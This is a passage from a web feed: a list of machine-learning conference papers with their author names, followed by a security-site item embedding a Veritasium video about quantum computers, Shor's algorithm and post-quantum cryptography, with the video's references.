<br><i>
Sharath Girish</i>, <i>Kamal Gupta</i>, <b><i>Saurabh Singh</i></b>, <i>Abhinav Shrivastava
</i></p>
<p>
<a href="https://openreview.net/pdf?id=nG9RF9z1yy3">DiffusER: Diffusion via Edit-Based Reconstruction</a>
<br><b><i>
Machel Reid</i></b>, <i>Vincent J. Hellendoorn</i>, <i>Graham Neubig
</i></p>
<p>
<a href="https://openreview.net/pdf?id=ORp91sAbzI">Leveraging Unlabeled Data to Track Memorization</a>
<br><i>
Mahsa Forouzesh</i>, <b><i>Hanie Sedghi</i></b>, <i>Patrick Thiran
</i></p>
<p>
<a href="https://openreview.net/pdf?id=4FBUihxz5nm">A Mixture-of-Expert Approach to RL-Based Dialogue Management</a>
<br><b><i>
Yinlam Chow</i></b>, <b><i>Aza Tulepbergenov</i></b>, <b><i>Ofir Nachum</i></b>, <b><i>Dhawal Gupta</i></b>, <b><i>Moonkyung Ryu</i></b>, <b><i>Mohammad Ghavamzadeh</i></b>, <b><i>Craig Boutilier
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=rSUCajhLsQ">Easy Differentially Private Linear Regression</a>
<br><b><i>
Kareem Amin</i></b>, <b><i>Matthew Joseph</i></b>, <b><i>Monica Ribero</i></b>, <b><i>Sergei Vassilvitskii
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=p0JSSa1AuV">KwikBucks: Correlation Clustering with Cheap-Weak and Expensive-Strong Signals</a>
<br><i>
Sandeep Silwal</i>*, <b><i>Sara Ahmadian</i></b>, <b><i>Andrew Nystrom</i></b>, <b><i>Andrew McCallum</i></b>, <b><i>Deepak Ramachandran</i></b>, <b><i>Mehran Kazemi
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=sIoED-yPK9l">Massively Scaling Heteroscedastic Classifiers</a>
<br><b><i>
Mark Collier</i></b>, <b><i>Rodolphe Jenatton</i></b>, <b><i>Basil Mustafa</i></b>, <b><i>Neil Houlsby</i></b>, <b><i>Jesse Berent</i></b>, <b><i>Effrosyni Kokiopoulou
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=TJ2nxciYCk-">The Lazy Neuron Phenomenon: On Emergence of Activation Sparsity in Transformers</a>
<br><b><i>
Zonglin Li</i></b>, <b><i>Chong You</i></b>, <b><i>Srinadh Bhojanapalli</i></b>, <b><i>Daliang Li</i></b>, <b><i>Ankit Singh Rawat</i></b>, <b><i>Sashank J. Reddi</i></b>, <b><i>Ke Ye</i></b>, <b><i>Felix Chern</i></b>, <b><i>Felix Yu</i></b>, <b><i>Ruiqi Guo</i></b>, <b><i>Sanjiv Kumar
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=gJW8hSGBys8">Compositional Semantic Parsing with Large Language Models</a>
<br><b><i>
Andrew Drozdov</i></b>, <b><i>Nathanael Scharli</i></b>, <b><i>Ekin Akyurek</i></b>, <b><i>Nathan Scales</i></b>, <b><i>Xinying Song</i></b>, <b><i>Xinyun Chen</i></b>, <b><i>Olivier Bousquet</i></b>, <b><i>Denny Zhou
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=ndYXTEL6cZz">Extremely Simple Activation Shaping for Out-of-Distribution Detection</a>
<br><i>
Andrija Djurisic</i>, <i>Nebojsa Bozanic</i>, <i>Arjun Ashok</i>, <b><i>Rosanne Liu
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=5MkYIYCbva">Long Range Language Modeling via Gated State Spaces</a>
<br><b><i>
Harsh Mehta</i></b>, <i>Ankit Gupta</i>, <i>Ashok Cutkosky</i>, <i>Behnam Neyshabur
</i></p>
<p>
<a href="https://openreview.net/pdf?id=sSt9fROSZRO">Investigating Multi-task Pretraining and Generalization in Reinforcement Learning</a>
<br><b><i>
Adrien Ali Taiga</i></b>, <b><i>Rishabh Agarwal</i></b>, <b><i>Jesse Farebrother</i></b>, <i>Aaron Courville</i>, <b><i>Marc G. Bellemare
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=k9CF4h3muD">Learning Low Dimensional State Spaces with Overparameterized Recurrent Neural Nets</a>
<br><i>
Edo Cohen-Karlik</i>, <i>Itamar Menuhin-Gruman</i>, <i>Raja Giryes</i>, <i>Nadav Cohen</i>, <b><i>Amir Globerson
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=CL-sVR9pvF">Weighted Ensemble Self-Supervised Learning</a>
<br><i>
Yangjun Ruan</i>*, <b><i>Saurabh Singh</i></b>, <b><i>Warren Morningstar</i></b>, <b><i>Alexander A. Alemi</i></b>, <b><i>Sergey Ioffe</i></b>, <b><i>Ian Fischer</i></b>, <b><i>Joshua V. Dillon
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=0qSOodKmJaN">Calibrating Sequence Likelihood Improves Conditional Language Generation</a>
<br><b><i>
Yao Zhao</i></b>, <b><i>Misha Khalman</i></b>, <b><i>Rishabh Joshi</i></b>, <b><i>Shashi Narayan</i></b>, <b><i>Mohammad Saleh</i></b>, <b><i>Peter J. Liu
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=OIe3kpwl40D">SMART: Sentences as Basic Units for Text Evaluation</a>
<br><b><i>
Reinald Kim Amplayo</i></b>, <b><i>Peter J. Liu</i></b>, <b><i>Yao Zhao</i></b>, <b><i>Shashi Narayan
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=9Nj_gNdvqYf">Leveraging Importance Weights in Subset Selection</a>
<br><b><i>
Gui Citovsky</i></b>, <b><i>Giulia DeSalvo</i></b>, <b><i>Sanjiv Kumar</i></b>, <b><i>Srikumar Ramalingam</i></b>, <b><i>Afshin Rostamizadeh</i></b>, <i>Yunjuan Wang</i>*
</p>
<p>
<a href="https://openreview.net/pdf?id=oGDKSt9JrZi">Proto-Value Networks: Scaling Representation Learning with Auxiliary Tasks</a>
<br><i><b>Jesse Farebrother</b></i>, <b><i>Joshua Greaves</i></b>, <b><i>Rishabh Agarwal</i></b>, <i>Charline Le Lan</i>, <b><i>Ross Goroshin</i></b>, <b><i>Pablo Samuel Castro</i></b>, <b><i>Marc G. Bellemare
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=n70oyIlS4g">An Extensible Multi-modal Multi-task Object Dataset with Materials</a>
<br><i>
Trevor Standley</i>, <i>Ruohan Gao</i>, <b><i>Dawn Chen</i></b>, <i>Jiajun Wu</i>, <i>Silvio Savarese
</i></p>
<p>
<a href="https://openreview.net/pdf?id=7bJizxLKrR">Measuring Forgetting of Memorized Training Examples</a>
<br><b><i>
Matthew Jagielski</i></b>, <b><i>Om Thakkar</i></b>, <i>Florian Tramér</i>, <b><i>Daphne Ippolito</i></b>, <b><i>Katherine Lee</i></b>, <b><i>Nicholas Carlini</i></b>, <i>Eric Wallace</i>, <b><i>Shuang Song</i></b>, <b><i>Abhradeep Thakurta</i></b>, <b><i>Nicolas Papernot</i></b>, <b><i>Chiyuan Zhang
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=wCFB37bzud4">Bidirectional Language Models Are Also Few-Shot Learners</a>
<br><i>
Ajay Patel</i>, <i>Bryan Li</i>, <i>Mohammad Sadegh Rasooli</i>, <b><i>Noah Constant</i></b>, <i>Colin Raffel</i>, <i>Chris Callison-Burch
</i></p>
<p>
<a href="https://openreview.net/pdf?id=xE-LtsE-xx">Is Attention All That NeRF Needs?</a>
<br><i>
Mukund Varma T.</i>, <i>Peihao Wang</i>, <i>Xuxi Chen</i>, <i>Tianlong Chen</i>, <b><i>Subhashini Venugopalan</i></b>,  <i>Zhangyang Wang
</i></p>
<p>
<a href="https://openreview.net/pdf?id=KfptQCEKVW4">Automating Nearest Neighbor Search Configuration with Constrained Optimization</a>
<br><b><i>
Philip Sun</i></b>, <b><i>Ruiqi Guo</i></b>, <b><i>Sanjiv Kumar
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=lLp-C5nTdJG">Static Prediction of Runtime Errors by Learning to Execute Programs with External Resource Descriptions</a>
<br><b><i>
David Bieber</i></b>, <i>Rishab Goel</i>, <b><i>Daniel Zheng</i></b>, <b><i>Hugo Larochelle</i></b>, <b><i>Daniel Tarlow
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=gmwDKo-4cY">Composing Ensembles of Pre-trained Models via Iterative Consensus</a>
<br><i>
Shuang Li</i>, <i>Yilun Du</i>, <i>Joshua B. Tenenbaum</i>, <i>Antonio Torralba</i>, <b><i>Igor Mordatch
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=oztkQizr3kk">Λ-DARTS: Mitigating Performance Collapse by Harmonizing Operation Selection Among Cells</a>
<br><i>
Sajad Movahedi</i>, <i>Melika Adabinejad</i>, <i>Ayyoob Imani</i>, <i>Arezou Keshavarz</i>, <b><i>Mostafa Dehghani</i></b>, <i>Azadeh Shakery</i>, <i>Babak N. Araabi
</i></p>
<p>
<a href="https://openreview.net/pdf?id=OjDkC57x5sz">Blurring Diffusion Models</a>
<br><b><i>
Emiel Hoogeboom</i></b>, <b><i>Tim Salimans
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=bAMTaeqluh4">Part-Based Models Improve Adversarial Robustness</a>
<br><i>
Chawin Sitawarin</i>, <i>Kornrapat Pongmala</i>, <i>Yizheng Chen</i>, <b><i>Nicholas Carlini</i></b>, <i>David Wagner
</i></p>
<p>
<a href="https://openreview.net/pdf?id=z0_V5O9cmNw">Learning in Temporally Structured Environments</a>
<br><b><i>
Matt Jones</i></b>, <b><i>Tyler R. Scott</i></b>, <b><i>Mengye Ren</i></b>, <b><i>Gamaleldin ElSayed</i></b>, <i><b>Katherine Hermann</b></i>, <b><i>David Mayo</i></b>, <b><i>Michael C. Mozer
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=TFbwV6I0VLg">SlotFormer: Unsupervised Visual Dynamics Simulation with Object-Centric Models</a>
<br><i>
Ziyi Wu</i>, <i>Nikita Dvornik</i>, <b><i>Klaus Greff</i></b>, <b><i>Thomas Kipf</i></b>, <i>Animesh Garg
</i></p>
<p>
<a href="https://openreview.net/pdf?id=I29Kt0RwChs">Robust Algorithms on Adaptive Inputs from Bounded Adversaries</a>
<br><i>
Yeshwanth Cherapanamjeri</i>, <i>Sandeep Silwal</i>, <i>David P. Woodruff</i>, <i>Fred Zhang</i>, <b><i>Qiuyi (Richard) Zhang</i></b>, <i>Samson Zhou
</i></p>
<p>
<a href="https://openreview.net/pdf?id=EnrY5TOrbQ">Agnostic Learning of General ReLU Activation Using Gradient Descent</a>
<br><b><i>
Pranjal Awasthi</i></b>, <i>Alex Tang</i>, <i>Aravindan Vijayaraghavan
</i></p>
<p>
<a href="https://openreview.net/pdf?id=3itjR9QxFw">Analog Bits: Generating Discrete Data Using Diffusion Models with Self-Conditioning</a>
<br><b><i>
Ting Chen</i></b>, <b><i>Ruixiang Zhang</i></b>, <b><i>Geoffrey Hinton
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=lEkl0jdSb7B">Any-Scale Balanced Samplers for Discrete Space</a>
<br><i>
Haoran Sun</i>*, <b><i>Bo Dai</i></b>, <b><i>Charles Sutton</i></b>, <b><i>Dale Schuurmans</i></b>, <b><i>Hanjun Dai
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=kPPVmUF6bM_">Augmentation with Projection: Towards an Effective and Efficient Data Augmentation Paradigm for Distillation</a>
<br><i>
Ziqi Wang</i>*, <b><i>Yuexin Wu</i></b>, <b><i>Frederick Liu</i></b>, <i>Daogao Liu</i>, <b><i>Le Hou</i></b>, <b><i>Hongkun Yu</i></b>, <b><i>Jing Li</i></b>, <i>Heng Ji
</i></p>
<p>
<a href="https://openreview.net/pdf?id=pOyi9KqE56b">Beyond Lipschitz: Sharp Generalization and Excess Risk Bounds for Full-Batch GD</a>
<br><i>
Konstantinos E. Nikolakakis</i>, <i>Farzin Haddadpour</i>, <b><i>Amin Karbasi</i></b>, <i>Dionysios S. Kalogerias
</i></p>
<p>
<a href="https://openreview.net/pdf?id=Ha2MnQM9Ph">Causal Estimation for Text Data with (Apparent) Overlap Violations</a>
<br><i>
Lin Gui</i>, <b><i>Victor Veitch
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=AjC0KBjiMu">Contrastive Learning Can Find an Optimal Basis for Approximately View-Invariant Functions</a>
<br><b><i>
Daniel D. Johnson</i></b>, <i>Ayoub El Hanchi</i>, <i>Chris J. Maddison
</i></p>
<p>
<a href="https://openreview.net/pdf?id=j1zQGmQQOX1">Differentially Private Adaptive Optimization with Delayed Preconditioners</a>
<br><i>
Tian Li</i>, <i>Manzil Zaheer</i>, <i>Ziyu Liu</i>, <b><i>Sashank Reddi</i></b>, <b><i>Brendan McMahan</i></b>, <i>Virginia Smith
</i></p>
<p>
<a href="https://openreview.net/pdf?id=3KUfbI9_DQE">Distributionally Robust Post-hoc Classifiers Under Prior Shifts</a>
<br><i>
Jiaheng Wei</i>*, <b><i>Harikrishna Narasimhan</i></b>, <b><i>Ehsan Amid</i></b>, <b><i>Wen-Sheng Chu</i></b>, <i>Yang Liu</i>, <b><i>Abhishek Kumar
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=ReDQ1OUQR0X">Human Alignment of Neural Network Representations</a>
<br><i>
Lukas Muttenthaler</i>, <i>Jonas Dippel</i>, <i>Lorenz Linhardt</i>, <i>Robert A. Vandermeulen</i>, <b><i>Simon Kornblith
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=JpbLyEI5EwW">Implicit Bias in Leaky ReLU Networks Trained on High-Dimensional Data</a>
<br><i>
Spencer Frei</i>, <i>Gal Vardi</i>, <b><i>Peter Bartlett</i></b>, <i>Nathan Srebro</i>, <i>Wei Hu
</i></p>
<p>
<a href="https://openreview.net/pdf?id=kUmdmHxK5N">Koopman Neural Operator Forecaster for Time-Series with Temporal Distributional Shifts</a>
<br><i>
Rui Wang</i>*, <b><i>Yihe Dong</i></b>, <b><i>Sercan Ö. Arik</i></b>, <i>Rose Yu
</i></p>
<p>
<a href="https://openreview.net/pdf?id=mQpmZVzXK1h">Latent Variable Representation for Reinforcement Learning</a>
<br><b><i>
Tongzheng Ren</i></b>, <i>Chenjun Xiao</i>, <b><i>Tianjun Zhang</i></b>, <b><i>Na Li</i></b>, <i>Zhaoran Wang</i>, <i>Sujay Sanghavi</i>, <b><i>Dale Schuurmans</i></b>, <b><i>Bo Dai
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=WZH7099tgfM">Least-to-Most Prompting Enables Complex Reasoning in Large Language Models</a>
<br><b><i>
Denny Zhou</i></b>, <b><i>Nathanael Scharli</i></b>, <b><i>Le Hou</i></b>, <b><i>Jason Wei</i></b>, <b><i>Nathan Scales</i></b>, <b><i>Xuezhi Wang</i></b>, <b><i>Dale Schuurmans</i></b>, <b><i>Claire Cui</i></b>, <b><i>Olivier Bousquet</i></b>, <b><i>Quoc Le</i></b>, <b><i>Ed Chi
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=4rXMRuoJlai">Mind's Eye: Grounded Language Model Reasoning Through Simulation</a>
<br><b><i>
Ruibo Liu</i></b>, <b><i>Jason Wei</i></b>, <b><i>Shixiang Shane Gu</i></b>, <i>Te-Yen Wu</i>, <i>Soroush Vosoughi</i>, <b><i>Claire Cui</i></b>, <b><i>Denny Zhou</i></b>, <b><i>Andrew M. Dai
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=H0HGljkxQFN">MOAT: Alternating Mobile Convolution and Attention Brings Strong Vision Models</a>
<br><i>
Chenglin Yang</i>*, <b><i>Siyuan Qiao</i></b>, <i>Qihang Yu</i>, <i>Xiaoding Yuan</i>, <b><i>Yukun Zhu</i></b>, <i>Alan Yuille</i>, <b><i>Hartwig Adam</i></b>, <b><i>Liang-Chieh Chen
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=HtoA0oT30jC">Novel View Synthesis with Diffusion Models</a>
<br><b><i>
Daniel Watson</i></b>, <b><i>William Chan</i></b>,<b><i> Ricardo</i></b> <b><i>Martin-Brualla</i></b>, <b><i>Jonathan Ho</i></b>, <b><i>Andrea Tagliasacchi</i></b>, <b><i>Mohammad Norouzi</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=fYzLpCsGZVf">On Accelerated Perceptrons and Beyond</a>
<br><i>
Guanghui Wang</i>, <i>Rafael Hanashiro</i>, <i>Etash Guha</i>, <b><i>Jacob Abernethy
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=rJcLocAJpA6">On Compositional Uncertainty Quantification for Seq2seq Graph Parsing</a>
<br><i>
Zi Lin</i>*, <b><i>Du Phan</i></b>, <b><i>Panupong Pasupat</i></b>, <b><i>Jeremiah Liu</i></b>, <i>Jingbo Shang
</i></p>
<p>
<a href="https://openreview.net/pdf?id=jbIYfq4Tr-">On the Robustness of Safe Reinforcement Learning Under Observational Perturbations</a>
<br><i>
Zuxin Liu</i>, <i>Zijian Guo</i>, <i>Zhepeng Cen</i>, <i>Huan Zhang</i>, <b><i>Jie Tan</i></b>, <i>Bo Li</i>, <i>Ding Zhao
</i></p>
<p>
<a href="https://openreview.net/pdf?id=47KG_AvNqeZ">Online Low Rank Matrix Completion</a>
<br><b><i>
Prateek Jain</i></b>, <b><i>Soumyabrata Pal
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=kJUS5nD0vPB">Out-of-Distribution Detection and Selective Generation for Conditional Language Models</a>
<br><b><i>
Jie Ren</i></b>, <i><b>Jiaming Luo</b></i>, <b><i>Yao Zhao</i></b>, <i>Kundan Krishna</i>*, <b><i>Mohammad Saleh</i></b>, <b><i>Balaji Lakshminarayanan</i></b>, <b><i>Peter J. Liu
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=mWVoBz4W0u">PaLI: A Jointly-Scaled Multilingual Language-Image Model</a>
<br><b><i>
Xi Chen</i></b>, <b><i>Xiao Wang</i></b>, <b><i>Soravit Changpinyo</i></b>, <b><i>AJ Piergiovanni</i></b>, <b><i>Piotr Padlewski</i></b>, <b><i>Daniel Salz</i></b>, <b><i>Sebastian Goodman</i></b>, <b><i>Adam Grycner</i></b>, <b><i>Basil Mustafa</i></b>, <b><i>Lucas Beyer</i></b>, <b><i>Alexander Kolesnikov</i></b>, <b><i>Joan Puigcerver</i></b>, <b><i>Nan Ding</i></b>, <b><i>Keran Rong</i></b>, <b><i>Hassan Akbari</i></b>, <b><i>Gaurav Mishra</i></b>, <b><i>Linting Xue</i></b>, <b><i>Ashish V. Thapliyal</i></b>, <b><i>James Bradbury</i></b>, <b><i>Weicheng Kuo</i></b>, <b><i>Mojtaba Seyedhosseini</i></b>, <b><i>Chao Jia</i></b>, <b><i>Burcu Karagol Ayan</i></b>, <b><i>Carlos Riquelme Ruiz</i></b>, <b><i>Andreas Peter Steiner</i></b>, <b><i>Anelia Angelova</i></b>, <b><i>Xiaohua Zhai</i></b>, <b><i>Neil Houlsby</i></b>, <b><i>Radu Soricut
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=vOEXS39nOF">Phenaki: Variable Length Video Generation from Open Domain Textual Descriptions</a>
<br><b><i>
Ruben Villegas</i></b>, <b><i>Mohammad Babaeizadeh</i></b>, <b><i>Pieter-Jan Kindermans</i></b>, <b><i>Hernan Moraldo</i></b>, <b><i>Han Zhang</i></b>, <b><i>Mohammad Taghi Saffar</i></b>, <i>Santiago Castro</i>*, <i>Julius Kunze</i>*, <b><i>Dumitru Erhan
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=gmL46YMpu2J">Promptagator: Few-Shot Dense Retrieval from 8 Examples</a>
<br><b><i>
Zhuyun Dai</i></b>, <b><i>Vincent Y. Zhao</i></b>, <b><i>Ji Ma</i></b>, <b><i>Yi Luan</i></b>, <b><i>Jianmo Ni</i></b>, <b><i>Jing Lu</i></b>, <b><i>Anton Bakalov</i></b>, <b><i>Kelvin Guu</i></b>, <b><i>Keith B. Hall</i></b>, <b><i>Ming-Wei Chang
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=MofT9KEF0kw">Pushing the Accuracy-Group Robustness Frontier with Introspective Self-Play</a>
<br><b><i>
Jeremiah Zhe Liu</i></b>, <b><i>Krishnamurthy Dj Dvijotham</i></b>, <b><i>Jihyeon Lee</i></b>, <b><i>Quan Yuan</i></b>, <b><i>Balaji Lakshminarayanan</i></b>, <b><i>Deepak Ramachandran
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=XSEBx0iSjFQ">Re-Imagen: Retrieval-Augmented Text-to-Image Generator</a>
<brp><b><i>
Wenhu Chen</i></b>, <b><i>Hexiang Hu</i></b>, <b><i>Chitwan Saharia</i></b>, <b><i>William W. Cohen
</i></b></brp></p>
<p>
<a href="https://arxiv.org/pdf/2210.01296.pdf">Recitation-Augmented Language Models</a>
<br><b><i>
Zhiqing Sun</i></b>, <b><i>Xuezhi Wang</i></b>, <b><i>Yi Tay</i></b>, <i>Yiming Yang</i>, <b><i>Denny Zhou
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=h9O0wsmL-cT">Regression with Label Differential Privacy</a>
<br><b><i>
Badih Ghazi</i></b>, <b><i>Pritish Kamath</i></b>, <b><i>Ravi Kumar</i></b>, <b><i>Ethan Leeman</i></b>, <b><i>Pasin Manurangsi</i></b>, <b><i>Avinash Varadarajan</i></b>, <b><i>Chiyuan Zhang
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=SNgLnzFQeiD">Revisiting the Entropy Semiring for Neural Speech Recognition</a>
<br><b><i>
Oscar Chang</i></b>, <b><i>Dongseong Hwang</i></b>, <b><i>Olivier Siohan
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=ALDM5SN2r7M">Robust Active Distillation</a>
<br><b><i>
Cenk Baykal</i></b>, <b><i>Khoa Trinh</i></b>, <b><i>Fotis Iliopoulos</i></b>, <b><i>Gaurav Menghani</i></b>, <b><i>Erik Vee
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=BYWWwSY2G5s">Score-Based Continuous-Time Discrete Diffusion Models</a>
<br><i>
Haoran Sun</i>*, <b><i>Lijun Yu</i></b>, <b><i>Bo Dai</i></b>, <b><i>Dale Schuurmans</i></b>, <b><i>Hanjun Dai
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=1PL1NIMMrw">Self-Consistency Improves Chain of Thought Reasoning in Language Models</a>
<br><b><i>
Xuezhi Wang</i></b>, <b><i>Jason Wei</i></b>, <b><i>Dale Schuurmans</i></b>, <b><i>Quoc Le</i></b>, <b><i>Ed H. Chi</i></b>, <b><i>Sharan Narang</i></b>, <b><i>Aakanksha Chowdhery</i></b>, <b><i>Denny Zhou
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=Ubc74gTVo3">Self-Supervision Through Random Segments with Autoregressive Coding (RandSAC)</a>
<br><b><i>
Tianyu Hua</i></b>, <i>Yonglong Tian</i>, <i>Sucheng Ren</i>, <b><i>Michalis Raptis</i></b>, <i>Hang Zhao</i>, <i>Leonid Sigal
</i></p>
<p>
<a href="https://openreview.net/pdf?id=T-qVtA3pAxG">Serving Graph Compression for Graph Neural Networks</a>
<br><b><i>
Si Si</i></b>, <b><i>Felix Yu</i></b>, <b><i>Ankit Singh Rawat</i></b>, <i>Cho-Jui Hsieh</i>, <b><i>Sanjiv Kumar
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=TTLLGx3eet">Sequential Attention for Feature Selection</a>
<br><i>
Taisuke Yasuda</i>*, <b><i>MohammadHossein Bateni</i></b>, <b><i>Lin Chen</i></b>, <b><i>Matthew Fahrbach</i></b>, <b><i>Gang Fu</i></b>, <b><i>Vahab Mirrokni
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=T5nUQDrM4u">Sparse Upcycling: Training Mixture-of-Experts from Dense Checkpoints</a>
<br><i>
Aran Komatsuzaki</i>*, <b><i>Joan Puigcerver</i></b>, <b><i>James Lee-Thorp</i></b>, <b><i>Carlos Riquelme</i></b>, <b><i>Basil Mustafa</i></b>, <b><i>Joshua Ainslie</i></b>, <b><i>Yi Tay</i></b>, <b><i>Mostafa Dehghani</i></b>, <b><i>Neil Houlsby
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=FBMLeaXpZN">Spectral Decomposition Representation for Reinforcement Learning</a>
<br><b><i>
Tongzheng Ren</i></b>, <b><i>Tianjun Zhang</i></b>, <b><i>Lisa Lee</i></b>, <i>Joseph Gonzalez</i>, <b><i>Dale Schuurmans</i></b>, <b><i>Bo Dai
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=9yE2xEj0BH7">Spotlight: Mobile UI Understanding Using Vision-Language Models with a Focus</a> (see <a href="https://ai.googleblog.com/2023/02/a-vision-language-approach-for.html">blog post</a>)<br><b><i>
Gang Li</i></b>, <b><i>Yang Li
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=8jU7wy7N7mA">Supervision Complexity and Its Role in Knowledge Distillation</a>
<br><i>
Hrayr Harutyunyan</i>*, <b><i>Ankit Singh Rawat</i></b>, <b><i>Aditya Krishna Menon</i></b>, <b><i>Seungyeon Kim</i></b>, <b><i>Sanjiv Kumar
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=GVSf7Z7DbYL">Teacher Guided Training: An Efficient Framework for Knowledge Transfer</a>
<br><i>
Manzil Zaheer</i>, <b><i>Ankit Singh Rawat</i></b>, <b><i>Seungyeon Kim</i></b>, <b><i>Chong You</i></b>, <b><i>Himanshu Jain</i></b>, <b><i>Andreas Veit</i></b>, <i>Rob Fergus</i>, <b><i>Sanjiv Kumar
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=gSHyqBijPFO">TEMPERA: Test-Time Prompt Editing via Reinforcement Learning</a>
<br><i>
Tianjun Zhang</i>, <b><i>Xuezhi Wang</i></b>, <b><i>Denny Zhou</i></b>, <b><i>Dale Schuurmans</i></b>, <i>Joseph E. Gonzalez
</i></p>
<p>
<a href="https://openreview.net/pdf?id=6ruVLB727MC">UL2: Unifying Language Learning Paradigms</a>
<br><b><i>
Yi Tay</i></b>, <b><i>Mostafa Dehghani</i></b>, <b><i>Vinh Q. Tran</i></b>, <b><i>Xavier Garcia</i></b>, <b><i>Jason Wei</i></b>, <b><i>Xuezhi Wang</i></b>, <b><i>Hyung Won Chung</i></b>, <b><i>Dara Bahri</i></b>, <b><i>Tal Schuster</i></b>, <b><i>Steven Zheng</i></b>, <b><i>Denny Zhou</i></b>, <b><i>Neil Houlsby</i></b>, <b><i>Donald Metzler
</i></b></p>

<!--Footnotes-->
<hr width="80%"><p>
  * Work done while at Google</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Quantum Computers Break The Internet... Starting Now]]></title>
<description><![CDATA[Author: Veritasium - Bewertung: 226726x - Views:4834858 A quantum computer in the next decade could crack the encryption our society relies on using Shor's Algorithm. Head to https://brilliant.org/veritasium to start your free 30-day trial, and the first 200 people get 20% off an annual premium s...]]></description>
<link>https://tsecurity.de/de/1872505/it-security-video/how-quantum-computers-break-the-internet-starting-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1872505/it-security-video/how-quantum-computers-break-the-internet-starting-now/</guid>
<pubDate>Wed, 19 Apr 2023 23:48:49 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/-UrdExQW0cs/hqdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: Veritasium - Bewertung: 226726x - Views:4834858 <br/></p><p><iframe id="ytplayer" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/-UrdExQW0cs?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>A quantum computer in the next decade could crack the encryption our society relies on using Shor's Algorithm. Head to https://brilliant.org/veritasium to start your free 30-day trial, and the first 200 people get 20% off an annual premium subscription.

▀▀▀
A huge thank you to those who helped us understand this complex field and ensure we told this story accurately - Dr. Lorenz Panny, Prof. Serge Fehr, Dr. Dustin Moody, Prof. Benne de Weger, Prof. Tanja Lange, PhD candidate Jelle Vos, Gorjan Alagic, and Jack Hidary.

A huge thanks to those who helped us with the math behind Shor’s algorithm - Prof. David Elkouss, Javier Pagan Lacambra, Marc Serra Peralta, and Daniel Bedialauneta Rodriguez.

▀▀▀
References:  
Joseph, D., et al. (2022). Transitioning organizations to post-quantum cryptography. Nature, 605(7909), 237-243. - https://ve42.co/Joseph2022

Bernstein, D. J., & Lange, T. (2017). Post-quantum cryptography. Nature, 549(7671), 188-194. - https://ve42.co/Bernstein2017

An Insight, An Idea with Sundar Pichai - Quantum Computing, Wold Economic Forum via YouTube - https://ve42.co/QCWEFyt

Migrating to Post-Quantum Cryptography, The White House - https://ve42.co/PQCWhiteHouse

Kotas, W. A. (2000). A brief history of cryptography. University of Tennessee - https://ve42.co/Kotas2000

Hellman, M. (1976). New directions in cryptography. IEEE transactions on Information Theory, 22(6), 644-654. - https://ve42.co/Hellman1976

Rivest, R. L., Shamir, A., & Adleman, L. (1978). A method for obtaining digital signatures and public-key cryptosystems. Communications of the ACM, 21(2), 120-126. - https://ve42.co/Rivest1978

Kak, A. (2023). Lecture 12: Public-Key Cryptography and the RSA Algorithm - https://ve42.co/Kak2023

Calderbank, M. (2007). The RSA Cryptosystem: History, Algorithm, Primes. University of Chicago. - https://ve42.co/Calderbank2007

Cryptographic Key Length Recommendation, Keylength - https://ve42.co/KeyLength

Coppersmith, D. (2002). An approximate Fourier transform useful in quantum factoring. arXiv preprint quant-ph/0201067. - https://ve42.co/Coppersmith2002

Quantum Fourier Transform, Qiskit - https://ve42.co/Qiskit 

Shor, P. W. (1994, November). Algorithms for quantum computation: discrete logarithms and factoring. In Proceedings 35th annual symposium on foundations of computer science (pp. 124-134). IEEE. - https://ve42.co/Shor1994

